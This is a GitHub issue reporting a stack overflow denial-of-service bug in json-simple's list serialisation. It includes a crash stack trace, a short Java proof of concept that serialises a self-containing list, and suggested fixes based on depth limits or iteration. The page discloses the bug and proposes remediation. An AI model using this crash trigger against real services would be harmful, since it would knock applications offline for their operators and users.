Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stack overflow error caused by json-simple serialization List #155

Open
PoppingSnack opened this issue Jun 9, 2023 · 0 comments
Open

Stack overflow error caused by json-simple serialization List #155

PoppingSnack opened this issue Jun 9, 2023 · 0 comments

Comments

@PoppingSnack
Copy link

Stack overflow error caused by json-simple serialization List

Description

json-simple before v1.1.1 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at java.base/java.lang.StringBuffer.<init>(StringBuffer.java:131)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:76)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)
	at org.json.simple.JSONArray.toJSONString(JSONArray.java:91)
	at org.json.simple.JSONValue.toJSONString(JSONValue.java:205)

PoC

        <dependency>
            <groupId>com.googlecode.json-simple</groupId>
            <artifactId>json-simple</artifactId>
            <version>1.1.1</version>
        </dependency>
import org.json.simple.JSONValue;
import java.util.ArrayList;

public class PoC3 {

    public static void main(String[] args) {
        ArrayList<Object> list = new ArrayList<>();
        list.add(list);
        JSONValue.toJSONString(list);
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))

References

  1. If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos jettison-json/jettison#52
  2. https://github.com/jettison-json/jettison/pull/53/files
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant